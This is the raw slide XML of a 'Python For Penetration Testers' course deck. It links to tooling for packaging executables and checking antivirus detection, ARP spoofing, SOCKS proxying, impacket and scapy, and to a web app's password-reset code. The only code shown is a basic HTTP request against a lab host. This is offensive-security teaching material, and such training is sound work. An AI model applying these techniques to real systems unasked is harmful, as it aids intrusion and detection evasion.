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3"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="564" r:id="rId3"/>
    <p:sldId id="770" r:id="rId4"/>
    <p:sldId id="566" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="568" r:id="rId7"/>
    <p:sldId id="569" r:id="rId8"/>
    <p:sldId id="571" r:id="rId9"/>
    <p:sldId id="572" r:id="rId10"/>
    <p:sldId id="573" r:id="rId11"/>
    <p:sldId id="574" r:id="rId12"/>
    <p:sldId id="575" r:id="rId13"/>
    <p:sldId id="576" r:id="rId14"/>
    <p:sldId id="577" r:id="rId15"/>
    <p:sldId id="578" r:id="rId16"/>
    <p:sldId id="579" r:id="rId17"/>
    <p:sldId id="580" r:id="rId18"/>
    <p:sldId id="581" r:id="rId19"/>
    <p:sldId id="582" r:id="rId20"/>
    <p:sldId id="583" r:id="rId21"/>
    <p:sldId id="585" r:id="rId22"/>
    <p:sldId id="586" r:id="rId23"/>
    <p:sldId id="587" r:id="rId24"/>
    <p:sldId id="588" r:id="rId25"/>
    <p:sldId id="589" r:id="rId26"/>
    <p:sldId id="590" r:id="rId27"/>
    <p:sldId id="592" r:id="rId28"/>
    <p:sldId id="593" r:id="rId29"/>
    <p:sldId id="594" r:id="rId30"/>
    <p:sldId id="595" r:id="rId31"/>
    <p:sldId id="596" r:id="rId32"/>
    <p:sldId id="597" r:id="rId33"/>
    <p:sldId id="598" r:id="rId34"/>
    <p:sldId id="599" r:id="rId35"/>
    <p:sldId id="600" r:id="rId36"/>
    <p:sldId id="601" r:id="rId37"/>
    <p:sldId id="602" r:id="rId38"/>
    <p:sldId id="603" r:id="rId39"/>
    <p:sldId id="605" r:id="rId40"/>
    <p:sldId id="606" r:id="rId41"/>
    <p:sldId id="607" r:id="rId42"/>
    <p:sldId id="608" r:id="rId43"/>
    <p:sldId id="609" r:id="rId44"/>
    <p:sldId id="610" r:id="rId45"/>
    <p:sldId id="611" r:id="rId46"/>
    <p:sldId id="612" r:id="rId47"/>
    <p:sldId id="613" r:id="rId48"/>
    <p:sldId id="614" r:id="rId49"/>
    <p:sldId id="615" r:id="rId50"/>
    <p:sldId id="616" r:id="rId51"/>
    <p:sldId id="617" r:id="rId52"/>
    <p:sldId id="618" r:id="rId53"/>
    <p:sldId id="619" r:id="rId54"/>
    <p:sldId id="620" r:id="rId55"/>
    <p:sldId id="621" r:id="rId56"/>
    <p:sldId id="622" r:id="rId57"/>
    <p:sldId id="623" r:id="rId58"/>
    <p:sldId id="624" r:id="rId59"/>
    <p:sldId id="625" r:id="rId60"/>
    <p:sldId id="626" r:id="rId61"/>
    <p:sldId id="627" r:id="rId62"/>
    <p:sldId id="628" r:id="rId63"/>
    <p:sldId id="629" r:id="rId64"/>
    <p:sldId id="630" r:id="rId65"/>
    <p:sldId id="631" r:id="rId66"/>
    <p:sldId id="632" r:id="rId67"/>
    <p:sldId id="633" r:id="rId68"/>
    <p:sldId id="634" r:id="rId69"/>
    <p:sldId id="672" r:id="rId70"/>
    <p:sldId id="673" r:id="rId71"/>
    <p:sldId id="674" r:id="rId72"/>
    <p:sldId id="675" r:id="rId73"/>
    <p:sldId id="676" r:id="rId74"/>
    <p:sldId id="677" r:id="rId75"/>
    <p:sldId id="678" r:id="rId76"/>
    <p:sldId id="679" r:id="rId77"/>
    <p:sldId id="680" r:id="rId78"/>
    <p:sldId id="681" r:id="rId79"/>
    <p:sldId id="682" r:id="rId80"/>
    <p:sldId id="683" r:id="rId81"/>
    <p:sldId id="684" r:id="rId82"/>
    <p:sldId id="685" r:id="rId83"/>
    <p:sldId id="686" r:id="rId84"/>
    <p:sldId id="687" r:id="rId85"/>
    <p:sldId id="688" r:id="rId86"/>
    <p:sldId id="689" r:id="rId87"/>
    <p:sldId id="690" r:id="rId88"/>
    <p:sldId id="691" r:id="rId89"/>
    <p:sldId id="635" r:id="rId90"/>
    <p:sldId id="636" r:id="rId91"/>
    <p:sldId id="637" r:id="rId92"/>
    <p:sldId id="639" r:id="rId93"/>
    <p:sldId id="640" r:id="rId94"/>
    <p:sldId id="641" r:id="rId95"/>
    <p:sldId id="642" r:id="rId96"/>
    <p:sldId id="643" r:id="rId97"/>
    <p:sldId id="692" r:id="rId98"/>
    <p:sldId id="693" r:id="rId99"/>
    <p:sldId id="694" r:id="rId100"/>
    <p:sldId id="695" r:id="rId101"/>
    <p:sldId id="696" r:id="rId102"/>
    <p:sldId id="697" r:id="rId103"/>
    <p:sldId id="698" r:id="rId104"/>
    <p:sldId id="699" r:id="rId105"/>
    <p:sldId id="700" r:id="rId106"/>
    <p:sldId id="701" r:id="rId107"/>
    <p:sldId id="702" r:id="rId108"/>
    <p:sldId id="703" r:id="rId109"/>
    <p:sldId id="704" r:id="rId110"/>
    <p:sldId id="705" r:id="rId111"/>
    <p:sldId id="706" r:id="rId112"/>
    <p:sldId id="707" r:id="rId113"/>
    <p:sldId id="708" r:id="rId114"/>
    <p:sldId id="709" r:id="rId115"/>
    <p:sldId id="711" r:id="rId116"/>
    <p:sldId id="712" r:id="rId117"/>
    <p:sldId id="713" r:id="rId118"/>
    <p:sldId id="714" r:id="rId119"/>
    <p:sldId id="733" r:id="rId120"/>
    <p:sldId id="734" r:id="rId121"/>
    <p:sldId id="735" r:id="rId122"/>
    <p:sldId id="736" r:id="rId123"/>
    <p:sldId id="737" r:id="rId124"/>
    <p:sldId id="644" r:id="rId125"/>
    <p:sldId id="645" r:id="rId126"/>
    <p:sldId id="646" r:id="rId127"/>
    <p:sldId id="647" r:id="rId128"/>
    <p:sldId id="648" r:id="rId129"/>
    <p:sldId id="649" r:id="rId130"/>
    <p:sldId id="650" r:id="rId131"/>
    <p:sldId id="651" r:id="rId132"/>
    <p:sldId id="652" r:id="rId133"/>
    <p:sldId id="653" r:id="rId134"/>
    <p:sldId id="654" r:id="rId135"/>
    <p:sldId id="655" r:id="rId136"/>
    <p:sldId id="656" r:id="rId137"/>
    <p:sldId id="657" r:id="rId138"/>
    <p:sldId id="658" r:id="rId139"/>
    <p:sldId id="659" r:id="rId140"/>
    <p:sldId id="660" r:id="rId141"/>
    <p:sldId id="661" r:id="rId142"/>
    <p:sldId id="662" r:id="rId143"/>
    <p:sldId id="663" r:id="rId144"/>
    <p:sldId id="664" r:id="rId145"/>
    <p:sldId id="665" r:id="rId146"/>
    <p:sldId id="666" r:id="rId147"/>
    <p:sldId id="667" r:id="rId148"/>
    <p:sldId id="668" r:id="rId149"/>
    <p:sldId id="669" r:id="rId150"/>
    <p:sldId id="670" r:id="rId151"/>
    <p:sldId id="671" r:id="rId152"/>
    <p:sldId id="715" r:id="rId153"/>
    <p:sldId id="716" r:id="rId154"/>
    <p:sldId id="717" r:id="rId155"/>
    <p:sldId id="718" r:id="rId156"/>
    <p:sldId id="719" r:id="rId157"/>
    <p:sldId id="720" r:id="rId158"/>
    <p:sldId id="721" r:id="rId159"/>
    <p:sldId id="722" r:id="rId160"/>
    <p:sldId id="723" r:id="rId161"/>
    <p:sldId id="724" r:id="rId162"/>
    <p:sldId id="725" r:id="rId163"/>
    <p:sldId id="726" r:id="rId164"/>
    <p:sldId id="727" r:id="rId165"/>
    <p:sldId id="728" r:id="rId166"/>
    <p:sldId id="729" r:id="rId167"/>
    <p:sldId id="730" r:id="rId168"/>
    <p:sldId id="731" r:id="rId169"/>
    <p:sldId id="732" r:id="rId170"/>
    <p:sldId id="738" r:id="rId171"/>
    <p:sldId id="739" r:id="rId172"/>
    <p:sldId id="740" r:id="rId173"/>
    <p:sldId id="741" r:id="rId174"/>
    <p:sldId id="742" r:id="rId175"/>
    <p:sldId id="743" r:id="rId176"/>
    <p:sldId id="744" r:id="rId177"/>
    <p:sldId id="745" r:id="rId178"/>
    <p:sldId id="746" r:id="rId179"/>
    <p:sldId id="747" r:id="rId180"/>
    <p:sldId id="748" r:id="rId181"/>
    <p:sldId id="749" r:id="rId182"/>
    <p:sldId id="750" r:id="rId183"/>
    <p:sldId id="751" r:id="rId184"/>
    <p:sldId id="752" r:id="rId185"/>
    <p:sldId id="753" r:id="rId186"/>
    <p:sldId id="754" r:id="rId187"/>
    <p:sldId id="755" r:id="rId188"/>
    <p:sldId id="756" r:id="rId189"/>
    <p:sldId id="757" r:id="rId190"/>
    <p:sldId id="758" r:id="rId191"/>
    <p:sldId id="759" r:id="rId192"/>
    <p:sldId id="760" r:id="rId193"/>
    <p:sldId id="761" r:id="rId194"/>
    <p:sldId id="762" r:id="rId195"/>
    <p:sldId id="763" r:id="rId196"/>
    <p:sldId id="764" r:id="rId197"/>
    <p:sldId id="765" r:id="rId198"/>
    <p:sldId id="766" r:id="rId199"/>
    <p:sldId id="767" r:id="rId200"/>
    <p:sldId id="769" r:id="rId201"/>
    <p:sldId id="554" r:id="rId2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018429-042B-40E5-B032-679514B46588}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="564"/>
            <p14:sldId id="770"/>
            <p14:sldId id="566"/>
            <p14:sldId id="257"/>
            <p14:sldId id="568"/>
            <p14:sldId id="569"/>
            <p14:sldId id="571"/>
            <p14:sldId id="572"/>
            <p14:sldId id="573"/>
            <p14:sldId id="574"/>
            <p14:sldId id="575"/>
            <p14:sldId id="576"/>
            <p14:sldId id="577"/>
            <p14:sldId id="578"/>
            <p14:sldId id="579"/>
            <p14:sldId id="580"/>
            <p14:sldId id="581"/>
            <p14:sldId id="582"/>
            <p14:sldId id="583"/>
            <p14:sldId id="585"/>
            <p14:sldId id="586"/>
            <p14:sldId id="587"/>
            <p14:sldId id="588"/>
            <p14:sldId id="589"/>
            <p14:sldId id="590"/>
            <p14:sldId id="592"/>
            <p14:sldId id="593"/>
            <p14:sldId id="594"/>
            <p14:sldId id="595"/>
            <p14:sldId id="596"/>
            <p14:sldId id="597"/>
            <p14:sldId id="598"/>
            <p14:sldId id="599"/>
            <p14:sldId id="600"/>
            <p14:sldId id="601"/>
            <p14:sldId id="602"/>
            <p14:sldId id="603"/>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631"/>
            <p14:sldId id="632"/>
            <p14:sldId id="633"/>
            <p14:sldId id="634"/>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35"/>
            <p14:sldId id="636"/>
            <p14:sldId id="637"/>
            <p14:sldId id="639"/>
            <p14:sldId id="640"/>
            <p14:sldId id="641"/>
            <p14:sldId id="642"/>
            <p14:sldId id="643"/>
            <p14:sldId id="692"/>
            <p14:sldId id="693"/>
            <p14:sldId id="694"/>
            <p14:sldId id="695"/>
            <p14:sldId id="696"/>
            <p14:sldId id="697"/>
            <p14:sldId id="698"/>
            <p14:sldId id="699"/>
            <p14:sldId id="700"/>
            <p14:sldId id="701"/>
            <p14:sldId id="702"/>
            <p14:sldId id="703"/>
            <p14:sldId id="704"/>
            <p14:sldId id="705"/>
            <p14:sldId id="706"/>
            <p14:sldId id="707"/>
            <p14:sldId id="708"/>
            <p14:sldId id="709"/>
            <p14:sldId id="711"/>
            <p14:sldId id="712"/>
            <p14:sldId id="713"/>
            <p14:sldId id="714"/>
            <p14:sldId id="733"/>
            <p14:sldId id="734"/>
            <p14:sldId id="735"/>
            <p14:sldId id="736"/>
            <p14:sldId id="737"/>
            <p14:sldId id="644"/>
            <p14:sldId id="645"/>
            <p14:sldId id="646"/>
            <p14:sldId id="647"/>
            <p14:sldId id="648"/>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715"/>
            <p14:sldId id="716"/>
            <p14:sldId id="717"/>
            <p14:sldId id="718"/>
            <p14:sldId id="719"/>
            <p14:sldId id="720"/>
            <p14:sldId id="721"/>
            <p14:sldId id="722"/>
            <p14:sldId id="723"/>
            <p14:sldId id="724"/>
            <p14:sldId id="725"/>
            <p14:sldId id="726"/>
            <p14:sldId id="727"/>
            <p14:sldId id="728"/>
            <p14:sldId id="729"/>
            <p14:sldId id="730"/>
            <p14:sldId id="731"/>
            <p14:sldId id="732"/>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9"/>
            <p14:sldId id="55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927B73-20E9-CC77-CD9D-A29E9E071643}" name="Joseph Ibrahim" initials="JI" userId="74a25621caa168f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16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70" d="100"/>
          <a:sy n="70" d="100"/>
        </p:scale>
        <p:origin x="7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5A145-4327-450F-ACCB-9700309DD7D9}"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49BEF-EB6E-4FE4-81AF-E3386FD05BC5}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135654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BB3245-4E80-4EF1-82C4-8FB823BEBD79}" type="datetime1">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2674258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80876B-7575-40EE-AE61-1EDCE54AD19A}" type="datetime1">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3980883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40EEBC-0E7B-4913-8A3B-149E26D9F54D}" type="datetime1">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206284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1B72A-FC3B-40A3-B4A5-05EF65DF73B3}" type="datetime1">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3794527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2BDF4-7E40-440F-9ADE-1D37D02D8788}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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234027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A76374-88B4-499E-BB77-9768538D0677}" type="datetime1">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1380092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F67830-8306-4084-851E-BC20F92D9256}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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2568308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995DDB-A632-4C88-BAFA-C4347F86C558}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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39856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2E1013-DDAD-4F5C-BBE8-3965CE18AF81}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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632758" y="6538912"/>
            <a:ext cx="619539" cy="365125"/>
          </a:xfrm>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421251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80E303-6082-4619-957A-F42E83119E31}" type="datetime1">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1692963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3F39F-E0FC-435F-97D0-B26D2B14975A}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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A35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2175257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43ED17-D907-43ED-A099-A2F0C4B4D431}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>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03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5935829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requests.org/en/lates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hyperlink" Target="https://cdn.educba.com/academy/wp-content/uploads/2019/07/OSI-Model.pn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ython-requests.org/en/lates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hyperlink" Target="https://en.wikipedia.org/wiki/ARP_spoofing"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media.springernature.com/original/springer-static/image/chp%3A10.1007%2F978-981-15-5029-4_8/MediaObjects/476516_1_En_8_Fig1_HTML.png" TargetMode="Externa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www.swig.org/download.html"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prdownloads.sourceforge.net/swig/swigwin-4.0.2.zip" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.png"/></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hyperlink" Target="https://github.com/pallets/flask"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github.com/py2exe/py2exe"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antiscan.m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s://github.com/pyinstaller/pyinstaller"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4.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://visualstudio.microsoft.com/vs/features/cplusplus/"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hyperlink" Target="https://antiscan.me/"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68.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nuitka.net/"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antiscan.m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lbadi132/PCPAPP/issues/1" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SHA-1"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php.net/manual/en/function.time.php" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/omr00t/PCPAPP/blob/main/app/Http/Controllers/Auth/ResetController.php" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide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lbadi132/PCPAPP/blob/a70ef3647257eb1fdccdc5046138277113225a82/app/Http/Controllers/Auth/ResetController.php#L84-L121"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hyperlink" Target="https://en.wikipedia.org/wiki/Setuid"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hyperlink" Target="https://man7.org/linux/man-pages/man7/capabilities.7.html"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keystone-engine/keystone"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capstone-engine/capstone"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students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html" TargetMode="External"/></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unicorn-engine/unicorn"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twitter.com/D4rkness_14"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albadi132/PCPAPP/blob/8c05d011edd19ccebbb2bbead7973536c8601d15/resources/views/mail/reset-pass.blade.php"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hyperlink" Target="https://twitter.com/D4rkness_14"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lbadi132/PCPAPP/blob/8c05d011edd19ccebbb2bbead7973536c8601d15/app/Http/Controllers/judge/JudgeController.php#L82-L91"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gitlab.com/omr00t/python-for-pentester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python.or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www.docker.com/"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SOCKS"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docs.docker.com/compos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en.wikipedia.org/wiki/SOCKS"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Amaindex/asyncio-socks-server" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/SOCKS#SOCKS5"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Amaindex/asyncio-socks-server"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rofl0r/proxychains-ng"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wireshark.or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webeduclick.com/wp-content/uploads/2020/03/IPv4-Frame-Format.pn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imperva.com/learn/wp-content/uploads/sites/13/2019/01/UDP-packet-1024x375.jpg"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lbadi132/PCPAPP"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github.com/KJ98-SE" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/albadi132"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ocs.python-requests.org/en/lates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hyperlink" Target="https://portswigger.net/burp/communitydownload"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www.paramiko.org/"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asyncssh.readthedocs.io/en/latest/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pexpect.readthedocs.io/en/stable/"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SecureAuthCorp/impacke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SecureAuthCorp/impacket/blob/master/examples/rdp_check.py"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hyperlink" Target="https://scapy.net/"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DB5A10-E28E-4DAB-9BB5-0A49F06C5E41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="753979" y="2867291"/>
            <a:ext cx="9589167" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="50000" endA="300" endPos="55500" dist="101600" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Python For Penetration Testers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D780600C-90E3-4E11-A8D3-3300154BC7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6140825" y="4648200"/>
            <a:ext cx="2895600" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="5400000" algn="t" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
            <a:reflection blurRad="6350" stA="52000" endA="300" endPos="35000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>With Yousuf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Alhajri</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400"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B339E69-19D5-41F8-B294-AC6472B41B61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{8C03CA35-DAD9-4D5F-96C9-AEFE3065062B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84448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27787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Making simple HTTP GET/POST requests with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>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24289" y="2618704"/>
            <a:ext cx="10137507" cy="387798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a:t>
            </a:r>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requests</a:t>
            </a:r>
          </a:p>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requests.get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res.text</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'&lt;!DOCTYPE html&gt;</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&lt;html lang="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>" x-data="data()"&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7BA7D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>\n</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res.status_code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>200</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res.history</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[&lt;Response [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>302</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]&gt;]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res.cookies</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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RequestsCookieJar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[Cookie(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="9CDCFE"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>version</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name</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'XSRF-TOKEN'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res.cookies</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"XSRF-TOKEN"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'eyJpdiI6IlFQOWVGbW9PSVVaREJ6Z1Jl...'</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res.url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'http://172.16.238.100/home'</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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make HTTP GET requests as follows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ABA8A428-6FD9-4A18-B2E6-03CE5B0909FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
